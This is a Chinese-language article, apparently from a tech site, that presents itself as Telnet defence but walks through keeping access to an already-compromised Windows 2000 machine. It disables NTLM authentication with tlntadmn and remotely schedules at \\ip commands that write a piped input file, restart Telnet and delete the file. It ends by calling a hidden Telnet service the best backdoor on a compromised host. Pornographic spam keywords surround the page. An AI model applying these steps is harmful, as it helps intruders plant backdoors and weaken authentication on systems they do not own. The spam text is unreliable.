成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Telnet服務的Tlntadmn修改問題

網絡 網絡管理
文章摘要:下面我們對Telnet服務修改Tlntadmn的相關設置進行一下描述。那么其中包括兩種方法,希望能夠給大家提供幫助。

對于Telnet的使用中,它的入侵問題一直都令我們擔憂。那么如何進行保護和防范呢?這里我們需要了解攻擊的原理。下面我們就介紹一下Telnet服務被入侵的過程吧。這樣也可以讓我們對防止這類事情有所幫助。在入侵中,得到管理員帳號之后,很多事情顯得輕而易舉,可有時候幸運之神并不是總落在你身上的,這不,剛剛溢出成功內網的機器,本想用IPC$連接上去,竟發現"網絡路徑不存在",看來有必要先運行一次:net share /y 啟動共享服務,顯示成功后,終于連接搞定了!不過在接下來的開Telnet服務中便遇到了NTLM認證的問題,搬出自己習慣使用的工具:不依賴于IPC共享的VBS腳本,連忙傳上去.運行之后卻顯示不成功,納悶了.只能驅貓上線,繼續我那無期的學習之路了,半晌終于找到一篇關開打開Telnet的教學,在再三測試后終于成功打開了那部機器的Telnet,經驗不敢獨享,寫出來與大家共賞.

我們知道WIN2000中自帶Tlntadmn命令,它可以更改Telnet的端口、運行參數、最大登錄人數等等,可惜討厭的NTLM認證會讓我們遠程無法登陸,現在我們需要的是擺脫NTLM認證的問題:

方法1:手動修改Tlntadmn:

我們按下面的命令直接在本地CMD下操作:

  1. C:\WINNT\system32>tlntadmn.exe  
  2. Microsoft (R) Windows 2000 (TM) (內部版本號 2195)  
  3. Telnet Server Admin (Build 5.00.99201.1) 

請在下列選項中選擇一個:

0) 退出這個應用程序

1) 列出當前用戶

2) 結束一個用戶的會話 ...

3) 顯示 / 更改注冊表設置 ...

4) 開始服務

5) 停止服務

請鍵入一個選項的號碼 [0 - 5] 以選擇該選項:

選3回車進入設置,進入如下子界面:

請在下列選項中選擇一個:

0) 退出這個菜單

1) AllowTrustedDomain

2) AltKeyMapping

3) DefaultDomain

4) DefaultShell

5) LoginScript

6) MaxFailedLogins

7) NTLM

8) TelnetPort

請鍵入一個選項的號碼 [0 - 8] 以選擇該選項:

我們選7,回車進入設置:NTLM的當前值=2,我們給它設置成1就可以了.設置完成后重啟Telnet服務:net stop Telnet、net start Telnet,再在本地連接23端口,輸入管理員帳號密碼就OK了!手動修改NTLM的方法就這么簡單,在平時入侵的時候,如果有3389等遠程連接方式,推薦大家使用這樣的方法去修改.#p#

方法2:利用腳本修改Tlntadmn:

有時我們出于特殊原因不要求立即停止Telnet服務或是變更NTLM模式,這時我們必須借助AT命令:at \\IP time 程序名,但實際上操作的話我們會發現:類似tlntadmn這樣的程序是控制臺的一個交互式工具,其參數設置并不能很好的被AT命令所調用,我們應如何處理呢?換句話說在沒有3389等遠程登陸的模式下,如何給方便的給對方開啟Telnet服務呢?我們可以將命令寫入一個txt文件,再加以調用.寫入的命令請按照下面的順序:

停止服務(5)->更改設置(3)->NTLM(7)->確認更改(y)->修改NTLM當前值(0)->再次確認(y)->退出菜單(0)->啟動服務(4)->退出程序(0)

在方法1中我們知道在每個選擇后面都要回車確認運行,所以我們要模擬操作寫入的數據應是:

5(回車)3(回車)7(回車)y(回車)0(回車)y(回車)0(回車)4(回車)0(回車)

現在我們有二種思路接下去做:一是直接在被入侵機器的CMD上制作txt文件以供調用;二是在本地生成txt再上傳到被入侵機器以供調用.

下面我們看他們分別是如何實現的:

1.直接在被入侵機器的CMD上制作txt文件以供調用.依次在cmd下如此運行命令:

  1. at \\ip time "echo 5 > c:\Telnet.txt"  
  2. at \\ip time "echo 3 >> c:\Telnet.txt"  
  3. at \\ip time "echo 7 >> c:\Telnet.txt"  
  4. at \\ip time "echo y >> c:\Telnet.txt"  
  5. at \\ip time "echo 0 >> c:\Telnet.txt"  
  6. at \\ip time "echo y >> c:\Telnet.txt"  
  7. at \\ip time "echo 0 >> c:\Telnet.txt"  
  8. at \\ip time "echo 4 >> c:\Telnet.txt"  
  9. at \\ip time "echo 0 >> c:\Telnet.txt"  
  10. at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt"  
  11. at \\ip time "del c:\Telnet.txt /f" 

只須按上面的命令行一行行打入運行就可以了.效果與方法1是等同的.

2.在本地生成txt再上傳到被入侵機器以供調用.在本地機器上做一個Telnet.txt文件,內容如下:

5 3 7 y 0 y 0 4 0

注意每一行都要加回車,然后將這個文件上傳到被入侵機器的C:盤下:

copy Telnet.txt \\ip\c$

再設置在某時間內啟動并刪除巳上傳文件: at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt" at \\ip time "del c:\Telnet.txt /f"

很簡單的dos管道重定向原理,這樣就完成tlntadmn的交互過程.效果與方法A是等同的,簡單那吧?

Tlntadmn在處理Telnet上顯得異常強大,在入侵過程中如果能熟練應用它,那么開放Telnet服務將顯得輕而易舉,當然,隱蔽的Telnet服務也就是肉雞上最好的后門了!你學會了嗎?
 

責任編輯:佟健 來源: 網界網
相關推薦

2010-07-20 15:28:34

2010-07-26 14:48:56

修改Telnet服務

2010-07-22 11:11:52

修改Telnet服務

2010-07-19 18:03:07

Telnet服務器

2010-07-16 14:16:23

Telnet服務

2010-07-15 15:21:25

AIX telnet

2010-07-20 14:55:16

Telnet端口

2010-07-20 13:41:30

Telnet服務器

2010-07-16 13:30:26

2010-07-26 13:12:42

2010-07-19 14:00:30

Telnet服務

2010-07-15 10:00:40

2009-12-01 13:35:39

Telnet服務

2010-07-20 15:01:31

Telnet服務

2010-07-25 14:18:51

telnet服務

2010-07-19 10:45:41

Telnet服務

2010-07-27 15:02:40

Telnet 110端

2010-07-22 11:23:02

AIX TELNET

2010-07-20 17:37:38

AIX TELNET

2010-07-26 10:11:10

Microsoft T
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久免费视频1 | 国产免费又色又爽又黄在线观看 | 精品久久国产 | 在线观看免费av片 | 一区二区三区视频在线观看 | 国产成人精品区一区二区不卡 | 亚洲网站在线观看 | 在线观看成人精品 | jizz在线免费观看 | 成人av播放 | 蜜桃av一区二区三区 | 午夜免费视频 | 浴室洗澡偷拍一区二区 | 成人毛片在线观看 | 亚洲精品黄 | 91视频.| 国产成人精品a视频 | 国产激情自拍视频 | 欧美成人一区二区三区 | 91xh98hx 在线 国产 | 精品一区二区三区入口 | 亚洲高清av | 亚洲色欧美另类 | 伊人网在线看 | 婷婷丁香在线视频 | 国产在线视频一区 | 激情五月婷婷在线 | 亚洲精品乱码久久久久久按摩观 | 五月激情久久 | 欧洲一区在线观看 | 欧美男人天堂 | 国产成人99久久亚洲综合精品 | 亚洲色图在线观看 | 精品福利在线 | 免费爱爱视频 | 日韩精品在线免费观看 | 欧美日韩亚洲一区 | 久久综合久 | 成人性生交a做片 | 99国产精品99久久久久久 | 国产精品不卡 |